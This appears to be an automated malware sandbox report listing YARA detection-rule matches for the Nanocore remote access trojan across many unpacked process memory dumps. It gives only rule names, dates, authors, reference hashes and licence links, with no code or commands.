Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
